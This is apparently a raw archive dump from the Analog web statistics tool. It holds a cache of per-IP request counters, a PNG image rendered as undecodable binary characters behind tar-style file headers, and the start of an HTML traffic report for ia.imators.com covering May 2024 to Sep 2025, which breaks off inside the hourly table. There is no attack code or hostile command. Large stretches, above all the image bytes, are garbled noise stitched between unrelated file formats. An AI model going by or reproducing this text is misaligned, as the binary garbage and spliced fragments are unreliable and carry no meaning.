0 28634445 0 0 2515 198.235.24.25 5 1 1 0 0 28655393 0 0 28655393 0 0 1262 198.235.24.24 5 0 0 0 1 0 0 28787121 0 0 28787121 0 205.210.31.98 5 3 1 0 0 28776330 0 0 28776330 0 0 3295 44.195.85.172 5 1 0 0 0 28861803 0 0 28861803 0 0 87 34.215.123.26 5 1 1 0 2 28955638 0 28955638 28955638 0 28955638 512 165.22.217.153 5 1 1 0 0 28783227 0 0 28783227 0 0 1258 198.235.24.18 5 1 1 0 15 28957306 0 28957307 28957306 0 28957306 1033 45.144.227.14 5 1 1 0 0 28737621 0 0 28737621 0 0 1258 205.210.31.92 5 1 1 0 0 29096456 0 0 29096456 0 0 1033 198.235.24.15 5 1 1 0 0 29390105 0 0 29390105 0 0 314 34.86.55.169 5 1 1 0 0 29289975 0 0 29289975 0 0 1257 198.235.24.13 5 1 1 0 0 28626998 0 0 28626998 0 0 1258 205.210.31.87 5 0 0 0 1 0 0 29364458 0 0 29364458 0 31.134.187.171 5 0 0 0 42 0 0 29306748 0 0 29306748 0 13.79.168.144 5 1 0 0 0 29129388 0 0 29129388 0 0 362 205.169.39.8 5 1 0 0 0 28686124 0 0 28686124 0 0 362 205.169.39.7 5 0 0 0 1 0 0 29364855 0 0 29364855 0 78.36.7.234 5 1 1 0 0 28696325 0 0 28696325 0 0 1257 205.210.31.81 5 1 0 0 0 28686124 0 0 28686124 0 0 2321 205.169.39.3 5 1 1 0 0 28621086 0 0 28621086 0 0 1261 18.202.77.169 5 0 0 0 1 0 0 28958847 0 0 28958847 0 205.210.31.75 5 0 0 0 1 0 0 29190598 0 0 29190598 0 27.218.38.217 5 2 2 0 0 29323968 0 0 29317808 0 0 1365 192.159.99.83 5 2 2 0 0 28600377 0 0 28600377 0 0 1216 159.65.218.12 5 0 0 0 1 0 0 29125507 0 0 29125507 0 176.125.228.155 5 1 1 0 1 28964798 0 28964798 28964798 0 28964798 512 167.94.138.50 5 1 0 0 0 28598314 0 0 28598314 0 0 87 3.135.185.63 5 2 2 0 2 28779005 0 28779005 28779005 0 28779005 1224 206.189.131.202 5 1 1 0 1 28673570 0 28673571 28673570 0 28673571 612 167.94.138.48 5 1 1 0 0 28641645 0 0 28641645 0 0 1257 205.210.31.66 5 2 2 0 1 29326449 0 29326449 29326449 0 29326449 1364 167.94.138.44 5 1 1 0 0 29258843 0 0 29258843 0 0 609 34.56.167.151 5 2 2 0 10 29145055 0 29145055 29144973 0 29145055 2066 103.129.215.7 5 2 2 0 1 29207634 0 29207634 29207634 0 29207634 1218 167.94.146.63 5 0 0 0 1 0 0 29211367 0 0 29211367 0 101.199.254.239 5 2 2 0 1 29113853 0 29113852 29113852 0 29113852 1024 167.94.138.43 5 0 0 0 8 0 0 29361369 0 0 29361369 0 94.137.227.201 5 0 0 0 1 0 0 29211367 0 0 29211367 0 101.199.254.238 5 1 0 0 0 29037485 0 0 29037485 0 0 87 13.213.43.237 5 1 1 0 0 29056162 0 0 29056162 0 0 1037 205.210.31.59 5 2 2 0 0 29228641 0 0 28611332 0 0 2519 205.210.31.60 5 0 0 0 1 0 0 28950818 0 0 28950818 0 5.135.58.206 5 1 1 0 1 29399356 0 29399356 29399356 0 29399356 314 64.226.114.251 5 1 1 0 1 28900564 0 28900564 28900564 0 28900564 512 167.94.146.57 5 1 1 0 0 29313301 0 0 29313301 0 0 682 104.196.66.170 5 0 0 0 1 0 0 29211367 0 0 29211367 0 101.199.254.234 5 1 1 0 1 28868938 0 28868938 28868938 0 28868938 512 167.94.146.56 5 1 1 0 0 29106218 0 0 29106218 0 0 1037 54.171.41.19 5 2 2 0 0 29213351 0 0 29213351 0 0 1866 64.64.112.153 5 1 1 0 0 28705922 0 0 28705922 0 0 1257 205.210.31.54 5 0 0 0 1 0 0 29211367 0 0 29211367 0 101.199.254.231 5 1 1 0 0 28784753 0 0 28784753 0 0 1261 205.210.31.53 5 1 1 0 1 28874559 0 29054005 28874559 0 29054005 1033 205.210.31.52 5 3 3 0 2 29125301 0 29125301 28795645 0 28795645 1636 167.94.146.50 5 2 2 0 0 28965720 0 0 28703539 0 0 2294 205.210.31.49 5 1 1 0 1 28761168 0 28761168 28761168 0 28761168 612 167.94.146.49 5 0 0 0 1 0 0 28929582 0 0 28929582 0 205.210.31.48 5 2 1 0 1 28862556 0 28862556 28862556 0 28862556 8743 106.75.166.28 5 1 1 0 0 29145386 0 0 29145386 0 0 1037 205.210.31.47 5 1 1 0 0 28714928 0 0 28714928 0 0 1261 34.244.1.114 5 1 1 0 1 29046735 0 29046735 29046735 0 29046735 512 142.93.41.223 5 1 1 0 1 28744724 0 29089939 28744724 0 29089939 1257 205.210.31.45 5 1 1 0 0 29021322 0 0 29021322 0 0 512 47.82.11.206 5 1 1 0 0 28656039 0 0 28656039 0 0 1261 205.210.31.44 5 1 0 0 0 29318915 0 0 29318915 0 0 1284 47.82.11.194 5 1 1 0 0 29224564 0 0 29224564 0 0 1257 205.210.31.43 5 1 1 0 0 29045957 0 0 29045957 0 0 1037 205.210.31.42 5 0 0 0 1 0 0 29069376 0 0 29069376 0 205.210.31.41 5 3 3 0 18 29316610 0 29316610 29316610 0 29316610 4095 165.232.160.135 5 0 0 0 186 0 0 29387122 0 0 29383751 0 13.79.87.25 5 1 1 0 0 28702282 0 0 28702282 0 0 1262 205.210.31.38 5 1 1 0 2 28935763 0 28935763 28935763 0 28935763 512 134.209.148.45 5 4 1 0 2 29359012 0 29359012 29359012 0 29359012 4311 34.1.30.176 5 0 0 0 1 0 0 29364468 0 0 29364468 0 82.194.247.4 5 1 1 0 0 28757814 0 0 28757814 0 0 1261 34.253.198.49 5 1 1 0 1 29306014 0 29306014 29306014 0 29306014 682 159.89.171.94 5 0 0 0 37 0 0 29187279 0 0 29187198 0 23.254.227.126 5 3 1 0 0 28917138 0 0 28917138 0 0 3195 54.167.92.154 5 1 1 0 0 28625918 0 0 28625918 0 0 1257 205.210.31.33 5 0 0 0 416 0 0 29372859 0 0 29367838 0 4.241.111.42 5 1 1 0 2 28940400 0 28940400 28940400 0 28940400 0 167.172.69.39 5 1 1 0 0 29336790 0 0 29336790 0 0 1365 205.210.31.31 5 2 2 0 0 29211367 0 0 29211367 0 0 1218 101.199.254.198 5 10 3 0 0 28861870 0 0 28686124 0 0 9039 34.123.170.104 5 1 1 0 1 29133144 0 29133144 29133144 0 29133144 512 159.89.171.89 5 0 0 0 1 0 0 29211367 0 0 29211367 0 101.199.254.206 5 1 1 0 0 29043256 0 0 29043256 0 0 512 47.82.11.180 5 1 1 0 1 29211367 0 29211367 29211367 0 29211367 1257 101.199.254.202 5 1 1 0 1 28885505 0 28885505 28885505 0 28885505 512 161.35.151.211 5 1 0 0 0 29125506 0 0 29125506 0 0 87 47.129.36.173 5 1 1 0 0 29074781 0 0 29074781 0 0 512 18.224.25.64 5 1 1 0 0 29029706 0 0 29029706 0 0 512 47.82.11.172 5 1 1 0 0 29283753 0 0 29283753 0 0 0 196.251.71.43 5 4 1 0 2 29355463 0 29355463 29355463 0 29355463 4311 34.1.16.79 5 2 2 0 61 29388817 0 29388817 29388817 0 29388817 628 45.148.10.250 5 2 2 0 0 28613562 0 0 28613562 0 0 1224 159.223.148.47 5 1 0 0 0 29324036 0 0 29324036 0 0 2321 45.148.10.248 5 2 2 0 0 29298295 0 0 28651780 0 0 2622 205.210.31.16 5 1 1 0 0 29326965 0 0 29326965 0 0 1365 205.210.31.15 5 0 0 0 1 0 0 29313155 0 0 29313155 0 45.148.10.246 5 1 1 0 0 28632695 0 0 28632695 0 0 1258 205.210.31.14 5 2 2 0 0 29254547 0 0 29026500 0 0 1121 47.82.11.165 5 3 3 0 17 29393906 0 29393907 29393906 0 29393906 1869 34.133.103.225 5 1 0 1 0 28695169 28695169 0 28695169 28695169 0 7604 205.210.31.13 5 0 0 0 1 0 0 29190599 0 0 29190599 0 36.147.108.156 5 0 0 0 1 0 0 29100022 0 0 29100022 0 173.208.148.34 5 2 2 0 0 28658095 0 0 28658095 0 0 1224 206.189.131.136 5 1 1 0 0 29350320 0 0 29350320 0 0 1365 205.210.31.10 5 2 2 0 2 28781676 0 28781676 28781676 0 28781676 1216 161.35.47.29 5 1 0 0 0 28598314 0 0 28598314 0 0 87 13.53.93.95 5 2 2 0 0 28633884 0 0 28633884 0 0 1224 206.189.225.190 5 0 0 0 1 0 0 29021745 0 0 29021745 0 45.148.10.238 5 1 0 0 0 29213346 0 0 29213346 0 0 87 16.16.166.187 5 3 3 0 18 29215170 0 29215170 29215170 0 29215170 3771 54.234.158.179 5 1 1 0 2 29056680 0 29056680 29056680 0 29056680 512 206.189.5.172 5 1 1 0 0 29125604 0 0 29125604 0 0 512 85.190.239.182 5 1 1 0 0 29073269 0 0 29073269 0 0 512 52.54.71.95 5 0 0 0 1 0 0 29125507 0 0 29125507 0 181.215.176.113 5 4 2 0 3 28698505 0 28698505 28698505 0 28698505 3675 35.207.248.104 5 0 0 1 6 0 28695432 28706013 0 28695432 28693820 0 45.148.10.230 5 5 1 0 1 28598320 0 28598320 28598320 0 28598320 4574 168.151.114.213 5 1 1 0 1 29258587 0 29258587 29258587 0 29258587 609 138.197.182.117 5 5 1 0 6 28770880 0 28770880 28770880 0 28770880 4574 81.243.18.204 5 0 0 0 1 0 0 29249534 0 0 29249534 0 195.178.110.75 5 1 1 0 0 29378647 0 0 29378647 0 0 0 196.251.71.13 5 1 1 0 0 28717760 0 0 28717760 0 0 1261 18.234.191.94 5 2 2 0 2 28801656 0 28801656 28801656 0 28801656 1216 24.199.102.14 5 1 1 0 1 28901921 0 28901921 28901921 0 28901921 509 35.88.14.3 5 0 0 0 1 0 0 29060915 0 0 29060915 0 89.248.163.34 5 1 1 0 1 29386755 0 29386755 29386755 0 29386755 314 64.227.139.41 5 3 0 0 0 28950912 0 0 28950908 0 0 3045 175.41.187.83 5 3 3 0 19 28968133 0 28968133 28968133 0 28968112 3099 188.166.189.148 5 1 0 0 0 28686123 0 0 28686123 0 0 87 34.219.125.28 5 0 0 0 1 0 0 29190598 0 0 29190598 0 36.102.164.114 5 0 0 0 1 0 0 29106653 0 0 29106653 0 195.178.110.65 5 1 1 0 0 29012090 0 0 29012090 0 0 512 87.236.176.90 5 1 1 0 0 28599365 0 0 28599365 0 0 612 87.236.176.89 5 0 0 0 1 0 0 28660294 0 0 28660294 0 185.199.103.57 5 1 0 0 0 29213346 0 0 29213346 0 0 87 18.236.100.4 5 0 0 0 3 0 0 28781237 0 0 28774509 0 45.148.10.206 5 0 0 0 1 0 0 28774705 0 0 28774705 0 47.89.195.210 5 3 1 0 9 29335324 0 29335324 29335324 0 29335324 3365 45.148.10.205 5 5 1 0 0 29301184 0 0 29301184 0 0 5055 54.89.94.158 5 1 1 0 5 29270173 0 29270173 29270173 0 29270173 1257 143.198.155.187 5 1 1 0 11 29108011 0 29108013 29108011 0 29108011 512 15.237.51.138 5 0 0 0 24 0 0 28775634 0 0 28775634 0 213.232.87.228 5 3 3 0 18 29365182 0 29365182 29365182 0 29365182 4095 40.160.7.167 5 0 0 0 150 0 0 29415130 0 0 29415130 0 4.189.253.242 5 1 1 0 0 28692637 0 0 28692637 0 0 612 87.236.176.77 5 2 2 0 0 28780700 0 0 28780700 0 0 1224 207.241.235.164 5 1 1 0 0 29125507 0 0 29125507 0 0 512 195.158.249.188 5 1 1 0 0 29244615 0 0 29244615 0 0 609 47.82.11.113 5 2 2 0 2 28747294 0 28747294 28747294 0 28747294 1224 64.227.172.157 5 8 8 0 8 28774913 0 28774913 28598348 0 28598348 4896 5.164.29.116 5 1 1 0 0 28720447 0 0 28720447 0 0 1262 18.203.250.49 5 1 1 0 0 28692685 0 0 28692685 0 0 612 87.236.176.70 5 2 2 0 0 29265860 0 0 29265860 0 0 609 192.64.113.146 5 0 0 0 1 0 0 29313368 0 0 29313368 0 203.89.120.12 5 1 1 0 1 28951710 0 28951710 28951710 0 28951710 512 165.227.139.97 5 0 0 0 2 0 0 29215382 0 0 29215382 0 167.172.90.253 5 0 0 0 1 0 0 28952004 0 0 28952004 0 217.182.186.43 5 5 1 0 1 29069110 0 29406080 29032968 0 29406080 5430 45.148.10.174 5 3 3 0 6 29249046 0 29249046 29249046 0 29248942 3771 203.89.120.10 5 0 0 0 1 0 0 28745083 0 0 28745083 0 195.178.110.35 5 0 0 0 2 0 0 28780367 0 0 28774355 0 45.148.10.172 5 0 0 0 1 0 0 29020835 0 0 29020835 0 192.42.116.194 5 0 0 0 5 0 0 29358942 0 0 29358942 0 217.150.201.180 5 0 0 0 1 0 0 29288639 0 0 29288639 0 147.93.158.41 5 0 0 0 1 0 0 29361307 0 0 29361307 0 109.196.75.89 z 0 24 24 29378647 0 z 2 64 0 29389149 5108 z 3 872 704 29416373 469950 z 4 514 318 29374548 888050 z 6 1 0 29250911 255950 c 200 1475 29416373 c 301 2 29403002 c 302 5 29250911 c 403 166 29361012 c 404 5248 29416373 refsite.png 0000644 00000006044 15114762025 0006722 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx��Ir���rkX��}+B��[�_�j���c� 8`J �CD�/��M�8|��Lq��d!�C�8zΣ'��,�q?9��z�a�T,�.V'XI���"�aİbX1,�A� �E�"�aİbX1,�A� �E�"h=,�ٶT���_��z�*�bXJ=]��X)ռ������>>�[��%���ʅ�|t-�%�. V]-Ӣ�R>� V�^��r���^�q{V`�$���V�H�Z���h�'��,��q���K�X�a}4���Ra}��D<��aX-: +������8f(�j��m��N}��ԯ�Pi�4�c���C8X�ׯ�¤�V�]bV�5 �|[��<XҫRG��p.i�g��aV9m�"r�'�X%,�Y����UN[,%�8H5��Dg����nF���e���fD!(/����UL[3�~��nv��.,�k�:=�6Vc����|s!`�ތ !`�ҖkC���n�m!��� kbīg��R����U0" V�DV'fX�w�Ò��-����XzХ�Ɉ�ѕ3����6��h�뵇� �"��=X}�ҩˤjK�qPv��&�t{9���!�v��&My<��@ vS ��� >,âk�=�,��7��5��)�`��2>D�j�X��5V.�0����a�n����}���Z�s[+K�n~h-��p�����{��`I�� ��Q��у��g]�r����J�hD \Ϻs �[���`��Y�װ\e`y.�}��e�V��ux �#��-$,(�\&J4�װ\����Z �2�ckX<,���� �Y�װ<$ �Ѕ6���|�JԳ��a�aE�5�V�C4�th%�����jX�`X*�������D����!�Ϧ!X����C<��j2��b#�1���Vl�kxX��! KVoĐVʇX��2+�g��BYXq�J�p3X�������n, ���� �R>�`E��֡�4�!�i+���+Z0,���m*y�r�`�F�}�,��U�%ZiX/�Ј�)�>�a���:/�*� ��p3Xn��֪j�D�+8~��>��5Qm�h%a�/W��V k�g9U��.�J�z�`F}H���˭gUx��o�0�6�5��gV�J��]�m ,��t���(X�������������'�C�S�i��<#���ذ.���V�C����q�W �=~�|�,j=K&���hXnں��\� f"&m��T� Җ�C"�0i�����ğY֠(� �I[nhmS�r�iDw��RX����Գ���y���%Z1, e�Ft|H�$-׆�zV �>6oײ�bX��;Â�YQd�ca�.�r��&Ra>`�YR �tq���%Z4Xsښ}�%�b=Kݕ7r�K���&#^��5)S��晝���&*�Ɉ�W�J(�@�p䞢�x�V��`�:C#���%-:�1m�>dX��ueXXc�z�wX���w��*�U����"��3��Z�J��%,k�`��Yџ���p���և����YG�r��=~�n�g�s��BX6muO[�YC�JsMV�3����E���еa��%���p),c��n��z�|�|�5Y��2F�>�V�����[����a��Y��r��N[ڇ�����gA$�g`i#�>\ +�jk8k`�F���Z�����V�a�z}bXX}vj%,S���L+a}}��`ٳ�j�B�֗R[��c��jX�K�E���h<Xj�RuU>�4�����k�ȲU*Ue�U���=�³@�a}��O:wSm��k�jTE��P��d��*X�k5,z~o�ܐa�bX1,�A�a�;C�Ű���*��a�yx��"h-��!�bX�W|��N����HG�����a�6e1,�A+a=ԑâ(���a��3dX%�C��X�u�ZX�2,�R���։Sâh���E�'�>� ��=� �a�9�E�`=VgȰ(J���y?Xg��dv�u�Z��;�F'��N�B�E�"x��N�Ν���B���;�E��~w�ur�/�F����aQ�����݅ ,LhQa�=�E ,���N�B"�����Ű(�a�}H�u~f`�C��Ű(�*���6���Rh�`5XYX��"�j!����'�Q��%T%�7XyX��E��B�*��� ���bX�ae}H�ՆK�2�E��� EV�C��jĄeX��1!hD4�f��Z�XX`��v��������X(X����1! `D��L���4".��7dB$,�����+�T�B�j)a ,�D��j*a 4�8m!`���V���ak�а��U��X�Xa�*�j-a ,��)�Ts&$��X�՞ ���Bgؠ���,��=(���#�,�6Q�a ���T��J� k�"��ߛE���"��SW`�VT ,�hf���/�|0-��q}{���Z˸Q���j֭��B��5.a�m�^�a=�A� �E�"�aİbX1,�A� �EP�NV��3��rXm����S�i����j��eaٙ�����:`��1���s��}a���[?���=L�� ���O1���L�̥�Xvf�CK)��Y(C3��J�֤�~G� ��`[� �����Aݶs�fF��Һ��E�E��RQ~��6�w���&��a����l\��� �؍�5���Ž�`�Q�cS| �E��^d �������r�0� �Չ�����h1~�b�5����6�?QO�l8�m�eW4���&#�a ���r�t��0� b�.��$�!tLRw�9$)5/L ~X�a5-����i �~3�Ґ���Y���������M$>7$�aİbX1,�A� �E�"�aİbX1,�A� K�PҰ~\X(=����ވ��Ep`��$8�����/goC� IEND�B`� 9.html 0000644 00000156706 15114762025 0005624 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for ia.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ia.imators.com/">ia.imators.com</a></h1> <p class="analysisspan">Program started on Tue, Sep 30 2025 at 12:11 PM. <br />Analyzed requests from Wed, May 15 2024 at 10:34 PM to Mon, Sep 29 2025 at 6:41 PM (501.84 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Sep 30 2025 at 12:11 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 1,335 (38) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (5) <br /><span class="gensumtitle">Successful requests for pages:</span> 933 (30) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (4) <br /><span class="gensumtitle">Failed requests:</span> 2,360 (18) <br /><span class="gensumtitle">Redirected requests:</span> 6 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 85 (1,125) <br /><span class="gensumtitle">Distinct hosts served:</span> 684 (854) <br /><span class="gensumtitle">Data transferred:</span> 1.43 megabytes (40.03 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.93 kilobytes (5.72 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">May 2024</td><td class="R">162</td><td class="P">101</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jun 2024</td><td class="R">69</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">141</td><td class="P">97</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">45</td><td class="P">41</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">148</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">59</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">63</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">21</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">65</td><td class="P">53</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">31</td><td class="P">21</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">May 2025</td><td class="R">79</td><td class="P">58</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jun 2025</td><td class="R">75</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">62</td><td class="P">55</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">134</td><td class="P">106</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">131</td><td class="P">83</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Aug 2025 (106 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 4 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">180</td><td class="P">147</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">147</td><td class="P">101</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">254</td><td class="P">165</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">149</td><td class="P">111</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">207</td><td class="P">125</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> <tr><td class="x">Fri</td><td class="R">181</td><td class="P">158</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">217</td><td class="P">126</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">36</td><td class="P">33</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">96</td><td class="P">54</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">52</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">127</td><td class="P">68</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 